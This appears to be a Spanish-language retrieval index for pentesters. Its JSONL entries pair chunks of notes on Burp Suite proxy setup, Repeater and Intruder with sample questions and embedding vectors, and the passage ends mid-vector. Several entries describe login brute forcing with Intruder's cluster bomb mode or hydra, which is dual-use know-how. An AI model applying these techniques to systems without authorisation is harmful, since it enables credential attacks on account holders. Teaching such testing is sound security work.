-0.02907, -0.00046, -0.11091, 0.13393, -0.07584, 0.02359, -0.13474, -0.05487, -0.08733, 0.03551, 0.06037, -0.00521, -0.00921, -0.05735, -0.05851, -0.12029, 0.02119, 0.04726, 0.0753, 0.04855, 0.03415, -0.20435, -0.05403, 0.01293, -0.01332, 0.0274, 0.08604, 0.00492, -0.00862, -0.03384, 0.02969, -0.02866, -0.02507, -0.05263, -0.0125, -0.00032, 0.02441, 0.06431, -0.02986, 0.0263, 0.06379, 0.07715, -0.07738, 0.07487, 0.02791, -0.11831, -0.04176, 0.10804, -0.0635, 0.03045, 0.01803, 0.02577, -0.03115, -0.03961, 0.13156, -0.04409, -0.06166, -0.02082, 0.08433, -0.05725, 0.06942, -0.09624, 0.00358, -0.00341, -0.04492, -0.0145, -0.03232, -0.0564, 0.01459, -0.07118, -0.08782, 0.09112, 0.08201, 0.11416, 0.0325, -0.00465, 0.02906, 0.14075, 0.02592, -0.06312, -0.05183, -0.05985, 0.01538, -0.00996, -0.03726, -0.03071, -0.00121, 0.0472, 0.05257, 0.05303, -0.01531, 0.02882, 0.03433, -0.033, -0.00306, 0.0181, -0.01157, -0.13928, 0.03392, -0.0592, 0.07412, -0.06102, 0.00621, -0.01909, 0.00137, -0.00811, 0.08502, 0.01703, -0.00998, 0.08313, -0.02332, 0.00302, 0.10095, -0.01246, -0.10223, -0.01238, -0.04809, -0.0052, 0.03118, 0.06233, -0.02804, 0.08728, -0.00713, 0.04884, -0.07792, -0.04711, -0.04706, 0.01323, 0.03535, -0.04318, 0.09108, 0.17744, -0.12606, 0.06116, 0.03801, 0.04723, 0.02788, 0.0102, 0.01595, -0.08148, -0.0185, -0.00018, 0.00123, 0.08464, -0.07793, -0.077, -0.00819, -0.03791, -0.04485, -0.04696, -0.01419, 0.09737, -0.00339, -0.0259, 0.00663, 0.00461, 0.00255, 0.05896, 0.06315, 0.0864, 0.00328, -0.0742, -0.03846, -0.02026, 0.00771, -0.08061, -0.00492, 0.05324, 0.00152, -0.00668, 0.02107, -0.05877, -0.02451, 0.00569, 0.0146, 0.02772, 0.00935, 0.04315, 0.02916, -0.00082, 0.06998, 0.00611, 0.00176, 0.0077, 0.02914, 0.06922, -0.11413, -0.02038, 0.06831, -0.00517, -0.0354, -0.03602, 0.01783, -0.04892, -0.01086, -0.00185, -0.02692, -0.00888, -0.02214, -0.03281, -0.03839, 0.04762, -0.03566]} -{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Intruder (automatizar payloads)\n- `Ctrl+I` envΓ­a aquΓ­. Marcas **posiciones** con `Add Β§` (Burp pone `Β§payloadΒ§`).\n- Tipos de ataque:\n```\nSniper β†’ 1 lista, 1 posiciΓ³n a la vez (fuzzing de un parΓ‘metro)\nBattering ram β†’ 1 lista, misma en todas las posiciones\nPitchfork β†’ N listas en paralelo (user[1]+pass[1], user[2]+pass[2]...)\nCluster bomb β†’ todas las combinaciones (user Γ— pass) β†’ fuerza bruta de login\n```\n- **Community va ralentizado** (throttle). Para fuerza bruta seria de login usa **hydra**; para fuzzing de rutas/params usa **ffuf** β†’ Content discovery.", "indexar": "que herramienta sirve para hacer fuerza bruta en logins?", "v": [0.04196, 0.00674, -0.25247, -0.14674, -0.0133, -0.05601, -0.04457, -0.00716, 0.0251, -0.12413, -0.07641, 0.01781, 0.03369, 0.06392, -0.0004, -0.06138, -0.01761, -0.1512, -0.14786, -0.06006, -0.03038, -0.04219, 0.0076, -0.0901, -0.14292, -0.04639, 0.02757, 0.0669, -0.20228, 0.05564, 0.01358, 0.10908, 0.12824, -0.0852, -0.02953, -0.01056, -0.06041, 0.03416, 0.09619, 0.12997, -0.08177, 0.11866, -0.04639, 0.02083, -0.02015, 0.04447, -0.00033, 0.05227, -0.01905, 0.12439, -0.09876, -0.16977, -0.04475, -0.05745, -0.07937, -0.20754, 0.1066, -0.14882, -0.12751, -0.02829, -0.12636, 0.02849, -0.07551, -0.07358, -0.0394, 2e-05, -0.00962, -0.07709, -0.00119, 0.0044, -0.17763, -0.03667, -0.02297, -0.05424, -0.08629, -0.03818, 0.02241, 0.0593, -0.00249, -0.00727, 0.02291, 0.01149, -0.15561, -0.0425, -0.07264, -0.07078, 0.0902, -0.01175, 0.01453, -0.04937, 0.01701, 0.05167, 0.0147, 0.00465, 0.02882, 0.04472, -0.00245, 0.00072, -0.00619, -0.07814, 0.0845, -0.12448, -0.03686, -0.05319, 0.05038, -0.06608, -0.0539, 0.00753, -0.07717, 0.08904, 0.06415, -0.02228, -0.05129, 0.0548, -0.00543, 0.10459, -0.07854, -0.11523, -0.03387, 0.00269, -0.0059, -8e-05, -0.06629, 0.00305, -0.05659, 0.05238, 0.03466, 0.05941, 0.03003, -0.11816, 0.03499, -0.02124, 0.00697, 0.02844, 0.01063, -0.08328, 0.05697, -0.14023, -0.02097, -0.09127, 0.01641, 0.04088, 0.00444, -0.12604, 0.03897, 0.05095, 0.04135, 0.00138, -0.03087, -0.01327, 0.09425, -0.08693, -0.002, 0.06673, -0.04218, -0.03043, 0.01511, -0.02842, -0.09305, 0.01396, -0.04885, -0.08584, -0.03695, -0.03334, -0.00153, -0.00507, -0.04222, -0.01768, 0.04252, 0.02757, 0.01831, -0.0278, 0.11102, 0.02944, 0.03697, -0.05111, -0.03012, 0.06567, -0.03234, 0.00181, 0.00747, -0.00464, -0.01183, -0.01009, 0.02271, -0.00603, 0.06163, -0.0449, 0.00983, 0.03036, -0.02585, 0.05291, -0.02553, -0.01169, 0.00907, -0.0097, -0.02961, -0.00431, 0.02828, -0.00254, 0.00099, -0.03968, 0.01377, -0.03754, 0.05168, 0.06168, 0.0248, -0.03952, 0.0026, -0.00017, 0.00285, 0.02869, 0.01178, -0.06052, -0.01606, -0.02194, -0.01765, 0.02745, -0.01125, 0.00013, -0.02426, 0.01498, -0.01745, 0.00634, -0.00548, 0.04343, 0.03855, -0.06858, -0.00036, 0.02334, 0.02461, -0.06053, -0.0082, 0.0138, -0.01498, -0.06381, 0.02756, 0.02151, -0.07928, 0.01055, -0.02536, 0.04453, 0.00142, -0.02695, -0.07366, -0.01467, 0.02184, -0.03975, -0.03738, -0.04239, -0.01082, -0.00822, 0.08351, 0.00214, 0.02396, -0.02022]} -{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Intruder (automatizar payloads)\n- `Ctrl+I` envΓ­a aquΓ­. Marcas **posiciones** con `Add Β§` (Burp pone `Β§payloadΒ§`).\n- Tipos de ataque:\n```\nSniper β†’ 1 lista, 1 posiciΓ³n a la vez (fuzzing de un parΓ‘metro)\nBattering ram β†’ 1 lista, misma en todas las posiciones\nPitchfork β†’ N listas en paralelo (user[1]+pass[1], user[2]+pass[2]...)\nCluster bomb β†’ todas las combinaciones (user Γ— pass) β†’ fuerza bruta de login\n```\n- **Community va ralentizado** (throttle). Para fuerza bruta seria de login usa **hydra**; para fuzzing de rutas/params usa **ffuf** β†’ Content discovery.", "indexar": "cual programa automatiza el fuzzing combinando varias listas de credenciales?", "v": [0.12019, 0.09956, -0.15306, 0.03972, 0.0829, -0.05645, 0.02066, -0.05669, -0.25408, -0.17539, -0.05773, -0.04861, -0.14584, 0.08377, 0.039, -0.00804, -0.00758, -0.11081, -0.00749, 0.01379, 0.07873, -0.10053, -0.04597, -0.18209, -0.07926, -0.02814, 0.04127, -0.00531, -0.05105, -0.02538, 0.08258, 0.05416, 0.01086, -0.01589, 0.03591, 0.01679, 0.03932, 0.0722, -0.04646, -0.01963, -0.01851, 0.11073, -0.09837, -0.00799, 0.06594, -0.03243, -0.01219, 0.03494, 0.00689, -0.08594, 0.00436, 0.05353, 0.02817, -0.01878, 0.15127, -0.1878, -0.0304, -0.10948, -0.01202, -0.02816, 0.081, 0.00654, 0.07462, 0.04394, -0.07428, 0.01325, 0.02412, -0.10453, 0.01638, 0.06923, 0.02011, 0.02186, 0.02719, -0.08736, -0.02732, 0.09792, 0.06752, -0.00416, 0.0047, -0.03071, 0.04272, -0.10855, 0.04044, 0.05479, -0.00245, -0.05695, 0.04974, -0.06056, -0.02207, 0.05564, 0.01267, 0.05711, -0.01326, 0.10225, 0.14771, -0.01284, 0.14625, 0.00861, 0.03052, 0.08669, 0.08111, -0.00887, -0.13192, 0.14845, -0.05997, 0.05055, 0.10315, 0.03599, 0.02901, -0.03926, -0.02653, 0.02805, 0.02034, -0.07108, -0.0348, -0.05716, -0.01504, 0.01313, 0.07351, -0.09699, -0.03293, -0.0055, -0.02644, -0.01949, 0.04716, 0.03295, -0.01413, 0.10812, -0.0562, 0.01954, 0.00792, 0.1162, -0.07711, -0.09744, 0.01973, -0.03442, 0.00991, -0.02868, -0.018, -0.03543, 0.05659, 0.09638, 0.13129, 0.02386, 0.08848, -0.05343, 0.02714, -0.06711, 0.00556, 0.08129, -0.03164, 0.0479, 0.00654, 0.044, -0.02047, -0.02302, 0.06537, -0.01825, -0.07504, 0.01065, 0.0204, 0.00521, -0.02245, 0.00092, 0.04228, 0.01358, 0.04535, 0.02552, 0.02234, -0.01536, 0.03854, 0.03747, -0.0092, -0.00605, -0.09094, -0.01677, -0.05566, -0.04152, 0.02029, -0.00074, -0.08332, 0.02313, 0.04495, -0.01963, 0.02723, -0.00427, -0.03038, 0.01832, 0.05099, 0.01114, -0.0241, -0.01362, -0.0663, 0.02103, 0.03018, 0.00926, 0.02906, -0.03529, 0.01289, -0.0754, -0.11131, -0.00033, -0.04518, -0.07945, 0.02917, 0.14176, 0.00639, 0.01253, 0.02913, 0.03278, 0.05277, -0.09676, 0.04666, -0.0392, -0.04199, -0.06313, -0.07484, -0.01718, 0.03621, 0.02216, 0.04176, -0.00023, 0.03757, 0.01969, -0.03703, -0.02108, 0.08359, 0.10203, 0.04267, 0.02151, -0.05485, -0.00437, 0.00421, -0.04074, 0.01339, 0.01873, 0.02266, 0.03859, -0.07071, -0.07992, 0.00193, 0.11859, -0.0132, -0.06916, -0.04053, 0.01844, -0.05186, 0.0076, 0.02104, -0.04812, -0.00586, 0.12842, 0.01139, -0.0436, 0.07192, -0.03993]} -{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Intruder (automatizar payloads)\n- `Ctrl+I` envΓ­a aquΓ­. Marcas **posiciones** con `Add Β§` (Burp pone `Β§payloadΒ§`).\n- Tipos de ataque:\n```\nSniper β†’ 1 lista, 1 posiciΓ³n a la vez (fuzzing de un parΓ‘metro)\nBattering ram β†’ 1 lista, misma en todas las posiciones\nPitchfork β†’ N listas en paralelo (user[1]+pass[1], user[2]+pass[2]...)\nCluster bomb β†’ todas las combinaciones (user Γ— pass) β†’ fuerza bruta de login\n```\n- **Community va ralentizado** (throttle). Para fuerza bruta seria de login usa **hydra**; para fuzzing de rutas/params usa **ffuf** β†’ Content discovery.", "indexar": "como monto un ataque con todas las combinaciones posibles de usuario y contraseΓ±a?", "v": [0.05098, 0.10326, -0.15005, -0.12533, -0.1779, 0.01334, -0.02892, -0.02488, -0.12224, -0.12451, 0.07306, -0.00258, 0.0031, 0.03627, 0.02258, -0.1058, 0.13229, 0.05021, 0.04551, -0.03861, 0.02808, -0.07445, 0.06217, -0.0391, -0.01282, 0.0218, 0.00768, 0.04837, -0.04371, -0.11264, 0.06314, 0.00224, 0.02246, 0.03451, 0.02402, 0.05467, 0.00843, 0.08574, 0.04626, 0.07354, 0.02791, -0.02596, -0.22857, 0.08006, -0.02847, 0.04999, -0.0006, 0.02184, 0.10588, -0.01837, -0.0002, 0.01059, -0.12575, -0.09716, 0.00953, -0.12177, 0.1821, -0.04904, 0.01174, 0.01783, -0.12118, 0.06556, 0.02401, 0.06644, -0.09309, -0.03133, -0.04175, 0.01161, -0.0991, 0.02157, 0.04463, -0.02781, -0.10692, 0.0374, 0.07469, 0.08265, 0.06039, 0.05568, 0.04018, 0.03221, -0.14122, -0.06336, -0.03385, 0.00233, -0.19806, -0.0392, 0.13915, -0.09591, 0.02274, -0.05945, 0.10502, -0.08996, 0.00188, 0.01347, -0.04682, -0.05741, -0.00834, -0.06384, -0.06075, -0.05209, -0.011, 0.03118, -0.0315, 0.12795, -0.0067, 0.004, -0.00385, -0.01552, -0.00269, -0.15466, 0.02839, -0.03256, -0.08511, -0.10565, -0.00566, -0.06603, -0.07276, -0.08704, 0.02417, -0.00212, -0.08788, -0.01548, -0.01048, 0.04256, -0.00446, -0.00474, -0.01572, 0.03007, -0.11706, -0.05885, -0.08523, 0.04864, -0.01489, -0.01692, -0.00673, 0.06286, -0.01963, -0.10628, -0.08388, 0.04038, 0.05069, 0.09825, 0.02612, -0.07893, 0.06127, 0.06583, 0.01752, -0.05238, -0.12839, 0.0849, -0.01368, 0.06086, -0.02574, 0.03085, -0.03408, 0.04018, -0.03509, -0.02586, 0.00164, 0.13506, -0.01221, -0.01624, -0.03285, 0.03163, -0.05529, -0.09633, -0.00362, -0.06353, 0.0578, -0.00572, 0.00625, 0.05671, -0.01001, -0.00278, -0.03257, -0.0715, -0.04599, -0.01549, -0.00457, -0.04212, -0.0408, -0.06369, -0.03819, -0.00548, 0.01056, -0.09193, 0.08556, 0.01691, 0.02329, -0.00561, 0.00037, 0.04238, -0.05871, 0.06152, 0.01419, -0.07569, -0.01828, 0.01152, 0.01105, -0.02948, 0.00648, -0.00497, -0.0577, -0.04777, 0.03518, 0.04689, -0.11534, -0.01979, -0.02148, 0.03816, 0.07559, -0.07292, 0.07721, -0.05931, -0.06063, -0.06966, 0.03222, 0.0269, -0.0511, -0.02571, 0.03225, 0.0706, 0.0542, 0.06254, 0.00989, -0.01695, -0.02733, -0.00748, 0.00517, 0.01168, -0.03105, 0.00261, -0.01267, -0.01744, 0.05097, -0.01819, 0.00664, -0.01471, -0.0782, -0.06331, -0.02571, 0.03688, 0.01461, -0.06168, -0.04515, -0.04321, -0.09166, 0.05853, -0.0145, -0.0675, -0.00938, 0.01729, 0.03697, -0.02496, 0.02681, -0.02882]} -{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## CuΓ‘ndo cada uno\n- ΒΏUna peticiΓ³n, muchas variantes a ojo? β†’ **Repeater**.\n- ΒΏMisma peticiΓ³n, cientos de payloads? β†’ **Intruder** (o ffuf/hydra si Community se queda corto).\n\nRelacionado: Burp Suite Β· Authentication attacks Β· OSCP MOC", "indexar": "ΒΏQuΓ© herramienta sirve para probar muchas variantes de una peticiΓ³n con diferentes parΓ‘metros?", "v": [-0.05456, 0.17167, -0.15159, -0.16841, -0.03351, -0.05207, 0.04161, -0.12361, 0.01076, -0.17119, 0.08587, -0.02684, 0.08851, -0.12471, -0.00238, 0.0694, 0.05931, -0.11678, 0.09182, 0.0248, 0.03374, -0.12107, -0.17011, -0.08555, -0.22218, 0.01335, 0.10574, -0.04486, -0.18963, 0.02721, -0.06942, 0.04642, 0.05563, -0.06703, -0.14849, -0.00234, -0.01363, -0.00588, 0.01371, 0.03869, 0.01087, -0.08467, 0.00694, -0.02883, 0.00908, 0.04753, -0.15963, 0.09155, -0.01496, 0.03088, -0.01117, -0.10021, -0.0867, 0.05434, -0.01897, -0.08876, 0.17061, -0.18045, -0.02733, -0.10163, -0.03712, -0.06802, 0.00079, -0.01925, 0.02571, -0.08438, -0.08117, -0.0377, -0.01423, 0.03773, -0.10336, 0.00838, -0.0299, -0.02486, -0.00346, 0.05495, 0.04652, -0.02864, 0.07169, -0.03339, 0.06851, 0.08707, -0.08482, 0.02479, -0.06621, -0.02037, 0.02874, -0.03357, 0.07102, -0.04913, 0.03828, 0.07047, 0.06126, 0.07976, 0.04639, -0.03836, 0.08037, 0.03201, 0.01479, -0.01414, 0.11142, -0.08529, -0.08841, 0.11118, -0.06252, 0.00897, -0.04131, -0.06212, -0.08014, 0.03392, 0.00743, -0.02467, -0.03693, 0.03869, 0.00816, 0.02273, -0.05949, -0.08197, -0.08884, -0.06308, 0.02191, 0.11797, -0.05851, -0.0368, 0.06369, -0.00325, 0.0123, 0.06551, 0.03406, -0.01143, 0.02342, -0.02063, -0.03866, 0.03978, -0.03645, 0.01553, 0.08771, -0.07065, -0.03537, -0.04807, 0.02748, 0.06102, 0.03461, -0.10802, 0.03334, -0.02673, 0.03804, -0.02406, -0.0756, 0.02492, -0.0179, -0.09472, 0.00036, 0.04745, -0.07972, 0.01341, -0.03075, -0.06183, -0.11711, 0.05772, -0.05884, 0.01211, 0.04066, -0.00437, 0.01023, -0.05928, -0.00482, -0.05388, 0.04684, 0.0361, 0.0074, 0.05403, 0.01312, -0.00288, 0.00231, -0.02353, -0.10304, -0.00781, 0.00112, -0.0686, -0.07763, 0.0275, -0.07049, 0.00715, 0.0983, -0.04884, 0.04643, 0.00385, 0.01932, 0.01418, 0.0395, 0.07416, 0.01564, -0.05893, 0.03756, 0.0012, 0.01336, -0.05693, 0.00807, 0.00654, -0.05756, -0.02979, -0.03173, -0.09962, 0.05809, 0.08207, -0.04888, -8e-05, 0.00948, -0.00468, 0.04343, 0.01951, 0.06956, -0.00662, -0.00179, -0.03986, 0.00853, 0.05241, 0.02679, -0.00966, 0.00946, 0.01877, 0.05353, 0.03134, -0.00972, 0.05989, 0.03157, 0.00043, -0.01207, 0.00936, 0.07717, 0.02921, -0.01649, -0.01625, 0.01363, 0.01195, 0.03297, 0.0018, -0.01998, -0.07636, 0.00131, 0.03271, 0.00968, 0.01811, -0.01083, -0.0371, -0.02844, -0.00104, -0.02179, -0.02858, -0.04818, 0.04066, 0.03804, -0.03846, 0.00848, -0.03095]} -{"tipo": "pregunta", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## CuΓ‘ndo cada uno\n- ΒΏUna peticiΓ³n, muchas variantes a ojo? β†’ **Repeater**.\n- ΒΏMisma peticiΓ³n, cientos de payloads? β†’ **Intruder** (o ffuf/hydra si Community se queda corto).\n\nRelacionado: Burp Suite Β· Authentication attacks Β· OSCP MOC", "indexar": "Con quΓ© programa puedo generar cientos de payloads para una misma solicitud si las herramientas bΓ‘sicas son insuficientes?", "v": [0.07993, 0.23092, -0.15902, -0.11193, 0.02528, -0.07572, 0.06647, -0.00151, -0.17983, -0.01902, -0.11467, 0.09057, -0.02379, -0.05324, -0.02719, 0.08056, 0.00081, -0.1024, -0.0039, 0.03875, 0.00035, -0.06532, -0.00192, -0.02165, -0.0855, 0.11125, 0.0403, -0.09595, -0.18188, 0.01531, -0.00737, 0.00192, 0.07111, -0.05073, -0.09162, 0.00292, -0.0884, 0.1113, -0.06942, 0.00952, 0.05233, 0.06459, -0.08936, 0.01254, 0.10323, 0.01592, 0.02995, 0.1272, 0.02004, -0.0417, -0.00811, -0.07069, -0.04163, 0.03796, -0.01867, -0.12301, 0.17007, -0.1611, -0.04141, -0.01118, -0.06204, 0.03429, 0.04925, -0.05105, -0.00117, -0.01822, 0.0234, -0.04432, -0.0188, 0.03585, -0.03751, -0.01928, -0.02579, -0.05397, 0.07676, -0.03486, -0.07746, -0.03462, 0.08105, 0.08624, 0.02201, 0.02066, -0.01755, 0.00729, -0.07675, -0.02081, 0.07379, -0.00097, 0.05411, -0.12973, 0.05823, 0.02984, -0.04213, 0.08612, -0.01829, -0.03622, 0.12209, 0.00158, 0.01213, 0.04611, -0.00093, -0.11735, 0.02057, 0.01652, -0.02351, 0.06467, 0.10169, -0.10252, -0.01638, 0.00465, -0.00061, -0.01021, 0.02103, -0.0109, -0.1025, -0.02569, -0.11027, 0.00896, 0.03612, -0.10821, -0.00873, 0.0657, -0.03657, 0.03733, 0.12952, -0.05424, -0.1149, 0.09764, 0.09396, 0.05642, 0.06905, 0.03991, 0.04648, -0.04556, -0.02832, -0.06251, 0.07099, -0.09261, -0.03123, -0.08855, 0.05323, 0.09419, 0.03441, -0.05667, 0.04393, 0.0112, -0.02288, -0.0928, -0.05963, -0.04845, 0.0435, -0.01012, 0.0068, 0.07861, -0.06948, -0.06501, 0.0696, 0.00426, -0.02655, -0.04292, 0.00168, -0.0174, -0.05724, -0.07733, 0.0247, -0.03908, -0.00604, 0.04143, -0.00775, 0.10333, -0.03132, 0.05099, 0.01818, -0.06051, 0.00868, -0.02399, -0.06536, -0.05318, 0.02826, -0.00718, -0.12362, 0.02342, -0.03933, 0.09502, 0.03762, -0.10104, -0.08207, 0.05535, 0.10909, 0.05834, 0.01176, 0.05876, -0.03794, -0.09753, 0.00911, 0.00735, -0.03593, 0.0082, 0.03575, -0.02579, 0.02569, 0.00027, -0.0254, -0.03651, 0.0422, 0.0718, -0.06706, -0.01532, 0.01168, 0.05045, 0.07886, -0.08175, 0.06783, -0.0609, -0.05485, -0.00148, -0.02772, 0.06785, 0.0366, 0.05842, 0.02112, 0.0034, 0.0418, 0.02303, 0.02346, 0.01509, 0.04158, 0.03119, 0.08256, 0.02604, 0.00288, -0.01265, 0.01617, -0.03563, 0.05141, 0.02213, -0.01839, 0.01318, -0.04549, 0.02692, 0.06175, 0.06289, -0.06669, -0.06246, -0.00629, -0.01129, -0.04681, -0.01284, 0.01241, -0.03083, -0.02052, 0.08571, 0.00021, -0.05832, 0.07525, -0.02088]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Burp Suite\n\n> El proxy de interceptaciΓ³n: se pone **entre tu navegador y la web** para ver y **modificar** cada peticiΓ³n. La herramienta nΒΊ1 del Hacking web. Instalado en `tu carpeta`.", "indexar": "quΓ© herramienta sirve para modificar las peticiones que voy haciendo desde mi navegador?", "v": [-0.00941, 0.21221, -0.21179, -0.10356, 0.02073, -0.06494, -0.03253, -0.01597, -0.00864, -0.19929, 0.03139, -0.05606, 0.04748, -0.14936, 0.07538, 0.03423, 0.14052, -0.08989, 0.11252, 0.07197, 0.02777, -0.03246, 0.03459, -0.01676, -0.17403, 0.02271, 0.05685, -0.08891, -0.12675, 0.0102, -0.04372, -0.00767, 0.01641, 0.01437, -0.10385, -0.01164, 0.03387, -0.01684, -0.03043, -0.01757, -0.01192, -0.05921, -0.07454, 0.03562, -0.02452, -0.02213, -0.04911, -0.00973, -0.06652, 0.0353, 0.01635, -0.11618, -0.11, 0.03954, -0.00288, -0.01134, 0.24941, -0.23966, 0.05619, -0.1397, -0.06414, -0.03542, -0.01223, 0.04295, 0.05964, -0.06279, -0.05353, -0.08462, 0.03834, 0.08162, -0.0793, -0.0607, 0.00825, -0.03352, 0.0488, 0.02568, 0.07124, -0.0188, 0.04509, 0.02164, 0.061, 0.0181, -0.17188, -0.02525, -0.01529, -0.03195, 0.01785, -0.04512, 0.05193, -0.03513, 0.04942, 0.17534, -0.01084, -0.00204, 0.00422, -0.01124, 0.08807, -0.00909, 0.03503, -0.00776, 0.12054, -0.07816, -0.06331, 0.00194, -0.00526, -0.04039, 0.01283, -0.11454, -0.01199, 0.08359, 0.04383, 0.02126, -0.00082, -0.04877, 0.04826, 0.04313, -0.09357, -0.05422, -0.09619, -0.09085, -0.0075, 0.0216, -0.13771, -0.02274, 0.0181, 0.01096, -0.05244, 0.05896, 0.01459, -0.06968, 0.0087, -0.06991, -0.0628, 0.00791, -0.01899, -0.01479, -0.01068, -0.08089, 0.05285, -0.03318, 0.0358, 0.03919, 0.00916, -0.07691, 0.04595, -0.01637, 0.00529, -0.03388, -0.08347, -0.05849, 0.04653, -0.08836, 0.02141, 0.01132, -0.04143, 0.07767, -0.00253, -0.02995, -0.08417, 0.07789, -0.0502, -0.01381, 0.05628, -0.0074, 0.01654, -0.11253, -0.0495, 0.01199, 0.11088, 0.05345, -0.00603, 0.00769, 0.00272, -0.05671, 0.05326, -0.07809, -0.0607, 0.02486, 0.01408, -0.00797, -0.01371, 0.01082, -0.04909, 0.01822, -0.02153, -0.07128, 0.04785, 0.01431, 0.03336, 0.04217, 0.03589, 0.07709, -0.00219, -0.05176, 0.07062, 0.00125, -0.05718, -0.04617, 0.05808, -0.02529, -0.02978, -0.04499, 0.02035, -0.06503, 0.02007, 0.05144, -0.00358, -0.04161, 0.00844, 0.05096, 0.04113, -0.0117, 0.04021, 0.01152, 0.02347, -0.02306, 0.04449, 0.04439, -0.02065, -0.04368, 0.02496, 0.01445, 0.02962, -0.02454, -0.0092, 0.04754, 0.06808, 0.00835, -0.03165, 0.03944, 0.01613, -0.02252, -0.05879, -0.04798, 0.03, -0.02287, 0.04252, -0.03763, -0.0649, -0.04746, 0.01802, 0.04833, 8e-05, -0.02502, -0.01255, -0.05938, -0.05306, 0.00957, 0.00831, -0.03829, -0.06986, 0.01051, 0.06739, -0.06355, -0.00144, -0.04132]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Burp Suite\n\n> El proxy de interceptaciΓ³n: se pone **entre tu navegador y la web** para ver y **modificar** cada peticiΓ³n. La herramienta nΒΊ1 del Hacking web. Instalado en `tu carpeta`.", "indexar": "con quΓ© puedo interceptar y cambiar el trΓ‘fico que envΓ­a mi ordenador a una web especΓ­fica?", "v": [0.06509, 0.21785, -0.07566, -0.17231, 0.10267, -0.03151, -0.01817, 0.09948, -0.02296, -0.04813, -0.02165, -0.11695, 0.01254, -0.01378, 0.09236, 0.03962, 0.07043, 0.03424, 0.14198, -0.06604, 0.05741, -0.01265, -0.02782, -0.112, 0.01007, -0.02391, -0.18784, 0.08025, -0.14536, -0.01718, -0.09081, -0.0065, 0.15957, 0.06093, -0.03672, -0.01298, 0.06227, 0.09796, 0.13349, -0.09075, 0.11494, -0.01737, -0.09469, 0.02669, 0.12144, -0.06778, -0.03741, -0.04744, -0.01673, -0.06152, 0.01748, -0.1, -0.14484, -0.14934, -0.08387, -0.00412, 0.15674, -0.09127, 0.09597, -0.02033, 0.04081, 0.13553, -0.01884, 0.02003, 0.04357, -0.02516, -0.05411, 0.02983, -0.13526, 0.00197, 0.01135, 0.04375, 0.0405, 0.07681, 0.10437, -0.01839, -0.00773, -0.00376, 0.13774, 0.05972, 0.06489, 0.00153, -0.08462, 0.03198, 0.06206, 0.01288, -0.01696, -0.12322, 0.01695, -0.04645, 0.05349, 0.11279, 0.00433, -0.00507, 0.04534, 0.03505, -0.0678, 0.00415, -0.04941, -0.03271, 0.0933, 0.00236, -0.13074, 0.14046, -0.02814, 0.04173, 0.02225, -0.02554, 0.03805, 0.00711, -0.03667, -0.00229, 0.02515, -0.04563, -0.03014, -0.04655, 0.03585, 0.00513, -0.0502, -0.04304, -0.12068, 0.00312, -0.02136, 0.00567, -0.02625, 0.01299, 0.0063, 0.10046, 0.0358, -0.02009, -0.07699, -0.0486, -0.03872, -0.08393, -0.05574, -0.00511, -0.05833, -0.09241, 0.00248, 0.01801, 0.02023, -0.00956, -0.00023, 0.0435, -0.0215, 0.0394, 0.03698, -0.0653, -0.14274, -0.08473, 0.02972, -0.0821, 0.00925, -0.05371, 0.01414, 0.0884, 0.00576, -0.05775, -0.03142, -0.01282, -0.03585, 0.08325, 0.02428, 0.03156, 0.04971, -0.04413, -0.0777, 0.03776, 0.02245, -0.00171, -0.09781, 0.00513, 0.00363, -0.12188, -0.00317, 0.00706, -0.10064, 0.01587, 0.00539, -0.05188, -0.0161, 0.07298, 0.00198, 0.08655, -0.02832, -0.00585, -0.02743, 0.04723, -0.08197, 0.02952, 0.0103, 0.0474, 0.01689, -0.01017, -0.00399, 0.03159, -0.04309, -0.01105, 0.05616, 0.01279, 0.00235, -0.09425, 0.01959, -0.03582, -0.03828, -0.01327, -0.05079, -0.06554, 0.02962, 0.05493, -0.04615, -0.0158, 0.03107, -0.02904, -0.01794, -0.05461, 0.05693, 0.03044, 0.03401, 0.03616, 0.05621, 0.00923, -0.00757, -0.02201, -0.03956, 0.01341, -0.03102, 0.02002, 0.0481, 0.03308, -0.00478, 0.00554, -0.01988, 0.00549, 0.00013, 0.00106, -0.05754, -0.01585, -0.07165, 0.02203, 0.02383, 0.0133, -0.01098, -0.09581, -0.00044, -0.00438, -0.12324, -0.00777, -0.04667, -0.05162, -0.0629, 0.02543, 0.01479, -0.02468, 0.00567, 0.00612]} -{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Montar el proxy (lo primero)\n1. Navegador β†’ proxy `127.0.0.1:8080` (usa **FoxyProxy** para alternar rΓ‘pido).\n2. Instala el certificado CA de Burp: visita `http://burp` β†’ *CA Certificate* β†’ impΓ³rtalo en el navegador (sin esto, HTTPS da error).\n3. O usa el **navegador embebido** de Burp (Proxy β†’ Open Browser), ya viene configurado.", "indexar": "que programa sirve para configurar un proxy y alternar entre sitios rΓ‘pidamente", "v": [0.02122, 0.1209, -0.29956, -0.16474, 0.13816, -0.09437, 0.05861, -0.11378, -0.10021, -0.08568, -0.00828, -0.03139, 0.02974, -0.12503, 0.04328, -0.02968, 0.0262, -0.10373, 0.09982, 0.07062, -0.05281, 